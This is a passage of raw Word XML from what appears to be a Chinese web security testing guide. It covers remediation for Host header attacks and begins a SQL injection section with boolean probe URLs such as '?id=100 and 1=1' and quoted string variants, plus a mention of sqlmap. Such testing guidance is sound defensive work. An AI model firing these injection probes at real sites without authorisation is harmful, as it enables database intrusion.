        <w:t xml:space="preserve"> host </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值直接拼接到生成链接中</w:t>
      </w:r>
      <w:r w:rsidR="009E4340" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15308E" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A0ECCA" w14:textId="77777777" w:rsidR="00872632" w:rsidRPr="005E6EBE" w:rsidRDefault="00872632" w:rsidP="005E6EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器方面：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA8F645" w14:textId="77777777" w:rsidR="00872632" w:rsidRPr="005E6EBE" w:rsidRDefault="00872632" w:rsidP="005E6EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求的特点，</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host header</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值其实是不可信的。唯一可信的只有</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SERVER_NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个在</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里可以通过设置一个虚拟机来记录所有的非法</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host header</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里还可以通过指定一个</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SERVER_NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名单，</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以通过指定一个</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SERVER_NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名单并开启</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UseCanonicalName</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项。建议两种方法同时使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC9CB1" w14:textId="77777777" w:rsidR="00872632" w:rsidRPr="005E6EBE" w:rsidRDefault="00872632" w:rsidP="005E6EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Varnish</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很快会发布一个补丁。在官方补丁出来前，可以通过在配置文件里加入：</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872632" w:rsidRPr="005E6EBE" w14:paraId="644EB892" w14:textId="77777777" w:rsidTr="001A6FF2">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141428"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import std;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185624EA"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 xml:space="preserve">        sub vcl_recv {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD2EB71"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 xml:space="preserve">                std.collect(req.http.host);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="259F1E00"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 xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B0B9953" w14:textId="77777777" w:rsidR="00872632" w:rsidRPr="005E6EBE" w:rsidRDefault="00872632" w:rsidP="005E6EBE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4705C84A"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hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、应用方面：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F569C9A" w14:textId="1C69369B" w:rsidR="00E32A36" w:rsidRDefault="00872632" w:rsidP="005E6EBE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在网站安装和初始化的时候，要求管理员提供一个可信任的域名白名单。如果这个实现起来比较困难，那至少也要保证使用</w:t>
      </w:r>
      <w:r w:rsidR="00E32A36" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00E32A36" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>getServerName()</w:t>
      </w:r>
      <w:r w:rsidR="00E32A36" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代替</w:t>
      </w:r>
      <w:r w:rsidR="00E32A36" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getHeader(</w:t>
      </w:r>
      <w:r w:rsidR="00E32A36" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>“Host”</w:t>
      </w:r>
      <w:r w:rsidR="00E32A36" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E32A36" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020C9CC" w14:textId="75C927FA" w:rsidR="00B76ACF" w:rsidRPr="005E6EBE" w:rsidRDefault="00B76ACF" w:rsidP="005E6EBE">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A86FCCE" w14:textId="4FB83C1A" w:rsidR="00A944EF" w:rsidRPr="00F757E4" w:rsidRDefault="001B6110" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc498434557"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="3AEFA986" w14:textId="51F5F68A" w:rsidR="00A944EF" w:rsidRPr="00020762" w:rsidRDefault="00A944EF" w:rsidP="00020762">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所谓</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入，就是通过把</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令插入到</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00867CE9" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。具体来说，它是利用现有应用程序，将（恶意）</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令注入到后台数据库引擎执行的能力，它可以通过在</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表单中输入（恶意）</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>造成</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00490F1B" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入漏洞原因有两个：一个是没有对输入的数据进行过滤（过滤输入），还有一个是没有对发送到数据库的数据进行转义（转义输出）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1747510D" w14:textId="77777777" w:rsidR="00A944EF" w:rsidRPr="00020762" w:rsidRDefault="00A944EF" w:rsidP="00020762">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB02D7" w14:textId="77777777" w:rsidR="00847C17" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描工具进行对网站爬虫后得到的所有链接进行检测，或者手工判断是否存在注入点，一旦确认存在漏洞，可利用自动化工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去尝试注入。几种常见的判断方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D8E4F9" w14:textId="23B459E6" w:rsidR="00847C17" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数字型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D4E964"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php?id=100 and 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0A7F5D"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php?id=100 and 1=2</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C4EB0E" w14:textId="0B5502A4" w:rsidR="00847C17" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A2A83"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http://host/test.php?name=rainman  </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  and </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ab/>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BDC6CC"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http://host/test.php?name=rainman </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  and </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2   </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E4E79" w14:textId="77777777" w:rsidR="006D2D18" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13804678" w14:textId="74254295"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搜索型注入：简单的判断搜索型注入漏洞</w:t>
      </w:r>
      <w:r w:rsidR="006D2D18" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在的办法是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C3293" w14:textId="545BCD0F" w:rsidR="00847C17" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
